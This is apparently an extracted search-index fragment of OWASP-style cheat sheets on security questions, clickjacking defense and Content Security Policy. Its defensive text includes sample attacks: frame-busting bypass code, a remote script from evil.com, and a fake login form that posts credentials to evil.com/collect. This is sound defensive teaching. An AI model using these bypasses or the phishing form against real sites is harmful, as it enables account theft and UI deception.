Confidential | The answer to the question must be hard for an attacker to obtain.
Specific | The answer should be clear to the user.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#types-of-security-questions","title":"Types of Security Questions","text":"

Security questions fall into two main types. With user defined security questions, the user must choose a question from a list, and provide an answer to the question. Common examples are \"What is your favourite colour?\" or \"What was your first car?\"

These are easy for applications to implement, as the additional information required is provided by the user when they first create their account. However, users will often choose weak or easily discovered answers to these questions.

System defined security questions are based on information that is already known about the user. This approach avoids having to ask the user to provide specific security questions and answers, and also prevents them from being able to choose weak details. However it relies on sufficient information already being stored about the user, and on this information being hard for an attacker to obtain.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#user-defined-security-questions","title":"User Defined Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#bad-questions","title":"Bad Questions","text":"

Any questions that do not have all of the characteristics discussed above should be avoided. The table below gives some examples of bad security questions:

Question | Problem
When is your date of birth? | Easy for an attacker to discover.
What is your memorable date? | Most users will just enter their birthday.
What is your favourite movie? | Likely to change over time.
What is your favourite cricket team? | Not applicable to most users.
What is the make and model of your first car? | Fairly small range of likely answers.

Additionally, the context of the application must be considered when deciding whether questions are good or bad. For example, a question such as \"What was your maths teacher's surname in your 8th year of school?\" would be very easy to guess if it was used in a virtual learning environment for your school (as other students probably know this information), but would be much stronger for an online gaming website.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#good-questions","title":"Good Questions","text":"

Many good security questions are not applicable to all users, so the best approach is to give the user a list of security questions that they can choose from. This allows you to have more specific questions (with more secure answers), while still providing every user with questions that they can answer.

The following list provides some examples of good questions:

Much like passwords, there is a risk that users will re-use recovery questions between different sites, which could expose the users if the other site is compromised. As such, there are benefits to having unique security questions that are unlikely to be shared between sites. An easy way to achieve this is to create more targeted questions based on the type of application. For example, on a share dealing platform, financial related questions such as \"What is the first company you owned shares in?\" could be used.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#allowing-users-to-write-their-own-questions","title":"Allowing Users to Write Their Own Questions","text":"

Allowing users to write their own security questions can result in them choosing very strong and unique questions that would be very hard for an attacker to guess. However, there is also a significant risk that users will choose weak questions. In some cases, users might even set a recovery question to a reminder of what their password is - allowing anyone guessing their email address to compromise their account.

As such, it is generally best not to allow users to write their own questions.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#restricting-answers","title":"Restricting Answers","text":"

Enforcing a minimum length for answers can prevent users from entering strings such as \"a\" or \"123\" for their answers. However, depending on the questions asked, it could also prevent users from being able to correctly answer the question. For example, asking for a first name or surname could result in a two letter answer such as \"Li\", and a colour-based question could be four letters such as \"blue\".

Answers should also be checked against a block list, including:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#renewing-security-questions","title":"Renewing Security Questions","text":"

If the security questions are not used as part of the main authentication process, then consider periodically prompting the user to review their security questions and verify that they still know the answers. This should give them a chance to update any answers that may have changed (although ideally this shouldn't happen with good questions), and increases the likelihood that they will remember them if they ever need to recover their account.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#system-defined-security-questions","title":"System Defined Security Questions","text":"

System defined security questions are based on information that is already known about the user. The users' personal details are often used, including the full name, address and date of birth. However these can easily be obtained by an attacker from social media, and as such provide a very weak level of authentication.

The questions that can be used will vary hugely depending on the application, and how much information is already held about the user. When deciding which bits of information may be usable for security questions, the following areas should be considered:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#using-security-questions","title":"Using Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#when-to-use-security-questions","title":"When to Use Security Questions","text":"

Applications should generally use a password along with a second authentication factor (such as an OTP code) to authenticate users. The combination of a password and security questions does not constitute MFA, as both factors are the same (i.e. something you know).

Security questions should never be relied upon as the sole mechanism to authenticate a user. However, they can provide a useful additional layer of security when other stronger factors are not available. Common cases where they would be used include:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#authentication-flow","title":"Authentication Flow","text":"

Security questions may be used as part of the main authentication flow to supplement passwords where MFA is not available. A typical authentication flow would be:

If the answers to the security questions are incorrect, then this should be counted as a failed login attempt, and the account lockout counter should be incremented for the user.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#forgotten-password-or-lost-mfa-token-flow","title":"Forgotten Password or Lost MFA Token Flow","text":"

Forgotten password functionality often provides a mechanism for attackers to enumerate user accounts if it is not correctly implemented. The following flow avoids this issue by only displaying the security questions once the user has proved ownership of the email address:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#how-to-use-security-questions","title":"How to Use Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#storing-answers","title":"Storing Answers","text":"

The answers to security questions may contain personal information about the user, and may also be re-used by the user between different applications. As such, they should be treated in the same way as passwords, and stored using a secure hashing algorithm such as Bcrypt. The password storage cheat sheet contains further guidance on this.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#comparing-answers","title":"Comparing Answers","text":"

Comparing the answers provided by the user with the stored answer in a case insensitive manner makes it much easier for the user. The simplest way to do this is to convert the answer to lowercase before hashing the answer to store it, and then lowercase the user-provided answer before comparing them.
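
A minimal sketch of the normalization step (the hashing and verification themselves should use the same password hashing routine described above, e.g. a bcrypt library):

#include <algorithm>\n#include <cctype>\n#include <string>\n\n// Lowercase the answer so that \"Smith\", \"SMITH\" and \"smith\" hash identically.\n// Apply this both when storing the hashed answer and when verifying a\n// user-supplied answer, then pass the result to the password hash function.\nstd::string NormalizeAnswer(std::string answer)\n{\n    std::transform(answer.begin(), answer.end(), answer.begin(),\n                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });\n    return answer;\n}\n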

It is also beneficial to give the user some indication of the format that they should use to enter answers. This could be done through input validation, or simply by recommending that the user enters their details in a specific format. For example, when asking for a date, indicating that the format should be \"DD/MM/YYYY\" will mean that the user doesn't have to try and guess what format they entered when registering.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#updating-answers","title":"Updating Answers","text":"

When the user updates the answers to their security questions, this should be treated as a sensitive operation within the application. As such, the user should be required to re-authenticate themselves by entering their password (or ideally using MFA), in order to prevent an attacker updating the questions if they gain temporary access to the user's account.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#multiple-security-questions","title":"Multiple Security Questions","text":"

When security questions are used, the user can either be asked a single question, or can be asked multiple questions at the same time. This provides a greater level of assurance, especially if the questions are diverse, as an attacker would need to obtain more information about the target user. A mixture of user-defined and system-defined questions can be very effective for this.

If the user is asked a single question out of a bank of possible questions, then this question should not be changed until the user has answered it correctly. If the attacker is allowed to try answering all of the different security questions, this greatly increases the chance that they will be able to guess or obtain the answer to one of them.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html","title":"Clickjacking Defense Cheat Sheet","text":""},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is intended to provide guidance for developers on how to defend against Clickjacking, also known as UI redress attacks.

There are three main mechanisms that can be used to defend against these attacks:

Note that these mechanisms are all independent of each other, and where possible more than one of them should be implemented in order to provide defense in depth.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-content-security-policy-csp-frame-ancestors-directive","title":"Defending with Content Security Policy (CSP) frame-ancestors directive","text":"

The frame-ancestors directive can be used in a Content-Security-Policy HTTP response header to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid Clickjacking attacks by ensuring that their content is not embedded into other sites.

frame-ancestors allows a site to authorize multiple domains using the normal Content Security Policy semantics.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#content-security-policy-frame-ancestors-examples","title":"Content-Security-Policy: frame-ancestors Examples","text":"

Common uses of CSP frame-ancestors:

Note that the single quotes are required around self and none, but may not occur around other source expressions.

See the following documentation for further details and more complex examples:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations","title":"Limitations","text":""},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#browser-support","title":"Browser Support","text":"

The following browsers support CSP frame-ancestors.

References:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-x-frame-options-response-headers","title":"Defending with X-Frame-Options Response Headers","text":"

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid Clickjacking attacks, by ensuring that their content is not embedded into other sites. Set the X-Frame-Options header for all responses containing HTML content. The possible values are \"DENY\", \"SAMEORIGIN\", or \"ALLOW-FROM uri\"

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#x-frame-options-header-types","title":"X-Frame-Options Header Types","text":"

There are three possible values for the X-Frame-Options header:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#browser-support_1","title":"Browser Support","text":"

The following browsers support X-Frame-Options headers.

References:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#implementation","title":"Implementation","text":"

To implement this protection, you need to add the X-Frame-Options HTTP Response header to any page that you want to protect from being clickjacked via framebusting. One way to do this is to add the HTTP Response Header manually to every page. A possibly simpler way is to implement a filter that automatically adds the header to every page, or to add it at the Web Application Firewall or Web/Application Server level.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#common-defense-mistakes","title":"Common Defense Mistakes","text":"

Meta-tags that attempt to apply the X-Frame-Options directive DO NOT WORK. For example, <meta http-equiv=\"X-Frame-Options\" content=\"deny\"> will not work. You must apply the X-FRAME-OPTIONS directive as HTTP Response Header as described above.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations_1","title":"Limitations","text":" "},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-samesite-cookies","title":"Defending with SameSite Cookies","text":"

The SameSite cookie attribute defined in RFC 6265bis is primarily intended to defend against cross-site request forgery (CSRF); however it can also provide protection against Clickjacking attacks.

Cookies with a SameSite attribute of either strict or lax will not be included in requests made to a page within an <iframe>. This means that if the session cookies are marked as SameSite, any Clickjacking attack that requires the victim to be authenticated will not work, as the cookie will not be sent. An article on the Netsparker blog provides further details on which types of requests cookies are sent for with the different SameSite policies.

This approach is discussed on the JavaScript.info website.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations_2","title":"Limitations","text":"

If the Clickjacking attack does not require the user to be authenticated, this attribute will not provide any protection.

Additionally, while SameSite attribute is supported by most modern browsers, there are still some users (approximately 6% as of November 2020) with browsers that do not support it.

The use of this attribute should be considered as part of a defence-in-depth approach, and it should not be relied upon as the sole protective measure against Clickjacking.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#best-for-now-legacy-browser-frame-breaking-script","title":"Best-for-now Legacy Browser Frame Breaking Script","text":"

One way to defend against clickjacking is to include a \"frame-breaker\" script in each page that should not be framed. The following methodology will prevent a webpage from being framed even in legacy browsers that do not support the X-Frame-Options header.

In the document HEAD element, add the following:

First apply an ID to the style element itself:

<style id=\"antiClickjack\">\nbody{display:none !important;}\n</style>\n

Then, delete that style by its ID immediately after in the script:

<script type=\"text/javascript\">\nif\u00a0(self\u00a0===\u00a0top)\u00a0{\nvar\u00a0antiClickjack\u00a0=\u00a0document.getElementById(\"antiClickjack\");\nantiClickjack.parentNode.removeChild(antiClickjack);\n}\u00a0else\u00a0{\ntop.location\u00a0=\u00a0self.location;\n}\n</script>\n

This way, everything can be in the document HEAD and you only need one method/taglib in your API.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#windowconfirm-protection","title":"window.confirm() Protection","text":"

The use of X-Frame-Options or a frame-breaking script is a more fail-safe method of clickjacking protection. However, in scenarios where content must be frameable, then a window.confirm() can be used to help mitigate Clickjacking by informing the user of the action they are about to perform.

Invoking window.confirm() will display a popup that cannot be framed. If the window.confirm() originates from within an iframe with a different domain than the parent, then the dialog box will display what domain the window.confirm() originated from. In this scenario the browser is displaying the origin of the dialog box to help mitigate Clickjacking attacks. It should be noted that Internet Explorer is the only known browser that does not display the domain that the window.confirm() dialog box originated from, to address this issue with Internet Explorer insure that the message within the dialog box contains contextual information about the type of action being performed. For example:

<script type=\"text/javascript\">\nvar\u00a0action_confirm\u00a0=\u00a0window.confirm(\"Are\u00a0you\u00a0sure\u00a0you\u00a0want\u00a0to\u00a0delete\u00a0your\u00a0youtube\u00a0account?\")\nif\u00a0(action_confirm)\u00a0{\n//...\u00a0Perform\u00a0action\n}\u00a0else\u00a0{\n//...\u00a0The\u00a0user\u00a0does\u00a0not\u00a0want\u00a0to\u00a0perform\u00a0the\u00a0requested\u00a0action.`\n}\n</script>\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#insecure-non-working-scripts-do-not-use","title":"Insecure Non-Working Scripts DO NOT USE","text":"

Consider the following snippet which is NOT recommended for defending against clickjacking:

<script>if (top!=self) top.location.href=self.location.href</script>\n

This simple frame breaking script attempts to prevent the page from being incorporated into a frame or iframe by forcing the parent window to load the current frame's URL. Unfortunately, multiple ways of defeating this type of script have been made public. We outline some here.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#double-framing","title":"Double Framing","text":"

Some frame busting techniques navigate to the correct page by assigning a value to parent.location. This works well if the victim page is framed by a single page. However, if the attacker encloses the victim in one frame inside another (a double frame), then accessing parent.location becomes a security violation in all popular browsers, due to the descendant frame navigation policy. This security violation disables the counter-action navigation.

Victim frame busting code:

if(top.location != self.location) {\nparent.location = self.location;\n}\n

Attacker top frame:

<iframe src=\"attacker2.html\">\n

Attacker sub-frame:

<iframe src=\"http://www.victim.com\">\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#the-onbeforeunload-event","title":"The onBeforeUnload Event","text":"

A user can manually cancel any navigation request submitted by a framed page. To exploit this, the framing page registers an onBeforeUnload handler which is called whenever the framing page is about to be unloaded due to navigation. The handler function returns a string that becomes part of a prompt displayed to the user.

Say the attacker wants to frame PayPal. They register an unload handler function that returns the string \"Do you want to exit PayPal?\". When this string is displayed, the user is likely to cancel the navigation, defeating PayPal's frame busting attempt.

The attacker mounts this attack by registering an unload event on the top page using the following code:

<script>\nwindow.onbeforeunload = function(){\nreturn \"Asking the user nicely\";\n}\n</script>\n\n<iframe src=\"http://www.paypal.com\">\n

PayPal's frame busting code will generate a BeforeUnload event activating our function and prompting the user to cancel the navigation event.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#no-content-flushing","title":"No-Content Flushing","text":"

While the previous attack requires user interaction, the same attack can be done without prompting the user. Most browsers (IE7, IE8, Google Chrome, and Firefox) enable an attacker to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting a navigation request to a site responding with \"204 - No Content\".

Navigating to a No Content site is effectively a NOP, but flushes the request pipeline, thus canceling the original navigation request. Here is sample code to do this:

var killbust = 0\nwindow.onbeforeunload = function() { killbust++ }\nsetInterval( function() {\nif(killbust > 0){\nkillbust = 2;\nwindow.top.location = 'http://nocontent204.com'\n}\n}, 1);\n
<iframe src=\"http://www.victim.com\">\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#exploiting-xss-filters","title":"Exploiting XSS filters","text":"

IE8 and Google Chrome introduced reflective XSS filters that help protect web pages from certain types of XSS attacks. Nava and Lindsay (at Blackhat) observed that these filters can be used to circumvent frame busting code. The IE8 XSS filter compares given request parameters to a set of regular expressions in order to look for obvious attempts at cross-site scripting. Using \"induced false positives\", the filter can be used to disable selected scripts. By matching the beginning of any script tag in the request parameters, the XSS filter will disable all inline scripts within the page, including frame busting scripts. External scripts can also be targeted by matching an external include, effectively disabling all external scripts. Since a subset of the loaded JavaScript (inline or external) is still functional and cookies are still available, this attack is effective for clickjacking.

Victim frame busting code:

<script>\nif(top != self) {\ntop.location = self.location;\n}\n</script>\n

Attacker:

<iframe src=\"http://www.victim.com/?v=<script>if''>\n

The XSS filter will match that parameter <script>if to the beginning of the frame busting script on the victim and will consequently disable all inline scripts in the victim's page, including the frame busting script. The XSSAuditor filter available for Google Chrome enables the same exploit.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#clobbering-toplocation","title":"Clobbering top.location","text":"

Several modern browsers treat the location variable as a special immutable attribute across all contexts. However, this is not the case in IE7 and Safari 4.0.4 where the location variable can be redefined.

IE7: Once the framing page redefines location, any frame busting code in a subframe that tries to read top.location will commit a security violation by trying to read a local variable in another domain. Similarly, any attempt to navigate by assigning top.location will fail.

Victim frame busting code:

if(top.location != self.location) {\ntop.location = self.location;\n}\n

Attacker:

<script>var location = \"clobbered\";</script>\n<iframe src=\"http://www.victim.com\"></iframe>\n

Safari 4.0.4:

We observed that although location is kept immutable in most circumstances, when a custom location setter is defined via __defineSetter__ (through window), the location object becomes undefined.

The framing page simply does:

<script>\nwindow.__defineSetter__(\"location\", function(){});\n</script>\n

Now any attempt to read or navigate the top frame's location will fail.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#restricted-zones","title":"Restricted zones","text":"

Most frame busting relies on JavaScript in the framed page to detect framing and bust itself out. If JavaScript is disabled in the context of the subframe, the frame busting code will not run. There are unfortunately several ways of restricting JavaScript in a subframe:

In IE 8:

<iframe src=\"http://www.victim.com\" security=\"restricted\"></iframe>\n

In Chrome:

<iframe src=\"http://www.victim.com\" sandbox></iframe>\n

Firefox and IE:

Activate designMode in the parent page.

document.designMode = \"on\";\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html","title":"Content Security Policy Cheat Sheet","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article provides a way to integrate the defense in depth concept into the client side of web applications. By injecting Content-Security-Policy (CSP) headers from the server, the browser becomes aware of, and capable of protecting the user from, dynamic calls that load content into the page currently being visited.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#context","title":"Context","text":"

The increase in XSS (Cross-Site Scripting), clickjacking, and cross-site leak vulnerabilities demands a greater defense-in-depth security approach.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-against-xss","title":"Defense against XSS","text":"

CSP defends against XSS attacks in the following ways:

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#1-restricting-inline-scripts","title":"1. Restricting Inline Scripts","text":"

By preventing the page from executing inline scripts, attacks like injecting

<script>document.body.innerHTML='defaced'</script>\n

will not work.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#2-restricting-remote-scripts","title":"2. Restricting Remote Scripts","text":"

By preventing the page from loading scripts from arbitrary servers, attacks like injecting

<script src=\"https://evil.com/hacked.js\"></script>\n

will not work.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#3-restricting-unsafe-javascript","title":"3. Restricting Unsafe JavaScript","text":"

By preventing the page from executing text-to-JavaScript functions like eval, the website will be safe from vulnerabilities like this one:

// A Simple Calculator\nvar op1 = getUrlParameter(\"op1\");\nvar op2 = getUrlParameter(\"op2\");\nvar sum = eval(`${op1} + ${op2}`);\nconsole.log(`The sum is: ${sum}`);\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#4-restricting-form-submissions","title":"4. Restricting Form submissions","text":"

By restricting where HTML forms on your website can submit their data, injecting phishing forms won't work either.

<form method=\"POST\" action=\"https://evil.com/collect\">\n<h3>Session expired! Please login again.</h3>\n<label>Username</label>\n<input type=\"text\" name=\"username\"/>\n\n<label>Password</label>\n<input type=\"password\" name=\"pass\"/>\n\n<input type=\"Submit\" value=\"Login\"/>\n</form>\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#5-restricting-objects","title":"5. Restricting Objects","text":"

And by restricting the HTML object tag, it also won't be possible for an attacker to inject malicious Flash, Java, or other legacy executables into the page.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-against-framing-attacks","title":"Defense against framing attacks","text":"

Attacks like clickjacking and some variants of browser side-channel attacks (xs-leaks) require a malicious website to load the target website in a frame.

Historically the X-Frame-Options header has been used for this, but it has been obsoleted by the frame-ancestors CSP directive.
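
For example, to prevent any site from framing your pages, a directive along the following lines can be used (a minimal illustration; adjust the allowed ancestors to your needs):

Content-Security-Policy: frame-ancestors 'none';\n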

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-in-depth","title":"Defense in Depth","text":"

A strong CSP provides an effective second layer of protection against various types of vulnerabilities, especially XSS. Although CSP doesn't prevent web applications from containing vulnerabilities, it can make those vulnerabilities significantly more difficult for an attacker to exploit.

Even on a fully static website, which does not accept any user input, a CSP can be used to enforce the use of Subresource Integrity (SRI). This can help prevent malicious code from being loaded on the website if one of the third-party sites hosting JavaScript files (such as analytics scripts) is compromised.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-is-not-a-substitute-for-secure-development","title":"CSP is not a substitute for secure development","text":"

CSP should not be relied upon as the only defensive mechanism against XSS. You must still follow good development practices such as the ones described in Cross-Site Scripting Prevention Cheat Sheet, and then deploy CSP on top of that as a bonus security layer.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#policy-delivery","title":"Policy Delivery","text":"

You can deliver a Content Security Policy to your website in three ways.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#1-content-security-policy-header","title":"1. Content-Security-Policy Header","text":"

Send a Content-Security-Policy HTTP response header from your web server.

Content-Security-Policy: ...\n

Using a header is the preferred way and supports the full CSP feature set. Send it in all HTTP responses, not just the index page.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#2-content-security-policy-report-only-header","title":"2. Content-Security-Policy-Report-Only Header","text":"

Using the Content-Security-Policy-Report-Only header, you can deliver a CSP that doesn't get enforced.

Content-Security-Policy-Report-Only: ...\n

Still, violation reports are printed to the console and delivered to a violation endpoint if the report-to and report-uri directives are used.

Browsers fully support the ability of a site to use both Content-Security-Policy and Content-Security-Policy-Report-Only together, without any issues. This pattern can be used for example to run a strict Report-Only policy (to get many violation reports), while having a looser enforced policy (to avoid breaking legitimate site functionality).
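
As a sketch of this pattern (the directives and the /csp-reports reporting endpoint below are placeholders), a looser policy can be enforced while a stricter one only reports:

Content-Security-Policy: default-src 'self' https:; report-uri /csp-reports\nContent-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-reports\n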

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#3-content-security-policy-meta-tag","title":"3. Content-Security-Policy Meta Tag","text":"

Sometimes you cannot use the Content-Security-Policy header, e.g., if you are deploying your HTML files on a CDN where the headers are out of your control.

In this case, you can still use CSP by specifying a http-equiv meta tag in the HTML markup, like so:

<meta http-equiv=\"Content-Security-Policy\" content=\"...\">\n

Almost everything is still supported, including full XSS defenses. However, you will not be able to use framing protections, sandboxing, or a CSP violation logging endpoint.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#http-headers","title":"HTTP Headers","text":"

The following are headers for CSP.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-directives","title":"CSP Directives","text":"

Multiple types of directives exist that allow the developer to control the flow of the policies granularly.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#fetch-directives","title":"Fetch Directives","text":"

Fetch directives tell the browser the locations to trust and load resources from.

Most fetch directives have a fallback list specified in the W3C specification. This list allows for granular control of the source of scripts, images, files, etc.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#document-directives","title":"Document Directives","text":"

Document directives instruct the browser about the properties of the document to which the policies will apply.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#navigation-directives","title":"Navigation Directives","text":"

Navigation directives instruct the browser about the locations that the document can navigate to.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#reporting-directives","title":"Reporting Directives","text":"

Reporting directives deliver violations of prevented behaviors to specified locations. These directives serve no purpose on their own and are dependent on other directives.

In order to ensure backward compatibility, use the two directives in conjunction. Whenever a browser supports report-to, it will ignore report-uri. Otherwise, report-uri will be used.
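
For illustration, a policy that uses both directives (the endpoint name and reporting URL are placeholders):

Reporting-Endpoints: csp-endpoint=\"https://example.com/csp-reports\"\nContent-Security-Policy: default-src 'self'; report-uri https://example.com/csp-reports; report-to csp-endpoint\n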

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#special-directive-sources","title":"Special Directive Sources","text":"Value Description 'none' No URLs match. 'self' Refers to the origin site with the same scheme and port number. 'unsafe-inline' Allows the usage of inline scripts or styles. 'unsafe-eval' Allows the usage of eval in scripts. 'strict-dynamic' Informs the browser to trust scripts originating from a root trusted script.

Note: strict-dynamic is not a standalone directive and should be used in combination with other directive values, such as nonce, hashes, etc.

To better understand how the directive sources work, check out the source lists from w3c.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#hashes","title":"Hashes","text":"

When inline scripts are required, the script-src 'hash_algo-hash' is one option for allowing only specific scripts to execute.

Content-Security-Policy: script-src 'sha256-V2kaaafImTjn8RQTWZmF4IfGfQ7Qsqsw9GWaFjzFNPg='\n

To get the hash, look at Google Chrome developer tools for violations like this:

\u274c Refused to execute inline script because it violates the following Content Security Policy directive: \"...\" Either the 'unsafe-inline' keyword, a hash ('sha256-V2kaaafImTjn8RQTWZmF4IfGfQ7Qsqsw9GWaFjzFNPg='), or a nonce...

You can also use this hash generator. This is a great example of using hashes.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#note","title":"Note","text":"

Using hashes is generally not a very good approach. If you change anything inside the script tag (even whitespace) by, e.g., formatting your code, the hash will be different, and the script won't render.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#nonces","title":"Nonces","text":"

Nonces are unique one-time-use random values that you generate for each HTTP response, and add to the Content-Security-Policy header, like so:

const nonce = uuid.v4();\nscriptSrc += ` 'nonce-${nonce}'`;\n

You would then pass this nonce to your view (using nonces requires non-static HTML) and render script tags that look something like this:

<script nonce=\"<%= nonce %>\">\n...\n</script>\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#warning","title":"Warning","text":"

Don't create a middleware that replaces all script tags with \"script nonce=...\" because attacker-injected scripts will then get the nonces as well. You need an actual HTML templating engine to use nonces.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#strict-dynamic","title":"strict-dynamic","text":"

The strict-dynamic directive can be used in combination with either hashes or nonces.

If the script block is creating additional DOM elements and executing JS inside of them, strict-dynamic tells the browser to trust those elements.

Note that strict-dynamic is a CSP level 3 feature and not very widely supported yet. For more details, check out strict-dynamic usage.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-sample-policies","title":"CSP Sample Policies","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#basic-csp-policy","title":"Basic CSP Policy","text":"

This policy prevents cross-site framing and cross-site form-submissions. It will only allow resources from the originating domain for all the default level directives and will not allow inline scripts/styles to execute.

If your application functions with these restrictions, it drastically reduces your attack surface and works with most modern browsers.

The most basic policy assumes:

Content-Security-Policy:\u00a0default-src\u00a0'self'; frame-ancestors 'self'; form-action 'self';\n

To tighten further, one can apply the following:

Content-Security-Policy:\u00a0default-src\u00a0'none';\u00a0script-src\u00a0'self';\u00a0connect-src\u00a0'self';\u00a0img-src\u00a0'self';\u00a0style-src\u00a0'self'; frame-ancestors 'self'; form-action 'self';\n

This policy allows images, scripts, AJAX, and CSS from the same origin and does not allow any other resources to load (e.g., object, frame, media, etc.).

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#upgrading-insecure-requests","title":"Upgrading insecure requests","text":"

If the developer is migrating from HTTP to HTTPS, the following directive will ensure that all requests will be sent over HTTPS with no fallback to HTTP:

Content-Security-Policy: upgrade-insecure-requests;\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#preventing-framing-attacks-clickjacking-cross-site-leaks","title":"Preventing framing attacks (clickjacking, cross-site leaks)","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#strict-policy","title":"Strict Policy","text":"

A strict policy's role is to protect against classical stored, reflected, and some of the DOM XSS attacks and should be the optimal goal of any team trying to implement CSP.

Google went ahead and set up a guide to adopt a strict CSP based on nonces.

Based on a presentation at LocoMocoSec, the following two policies can be used to apply a strict policy:

script-src 'nonce-r4nd0m' 'strict-dynamic';\nobject-src 'none'; base-uri 'none';\n
script-src 'nonce-r4nd0m';\nobject-src 'none'; base-uri 'none';\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#refactoring-inline-code","title":"Refactoring inline code","text":"

When default-src or script-src* directives are active, CSP by default disables any JavaScript code placed inline in the HTML source, such as this:

<script>\nvar foo = \"314\"\n</script>\n

The inline code can be moved to a separate JavaScript file and the code in the page becomes:

<script src=\"app.js\">\n</script>\n

With app.js containing the var foo = \"314\" code.

The inline code restriction also applies to inline event handlers, so that the following construct will be blocked under CSP:

<button id=\"button1\" onclick=\"doSomething()\">\n

This should be replaced by addEventListener calls:

document.getElementById(\"button1\").addEventListener('click',\u00a0doSomething);\n
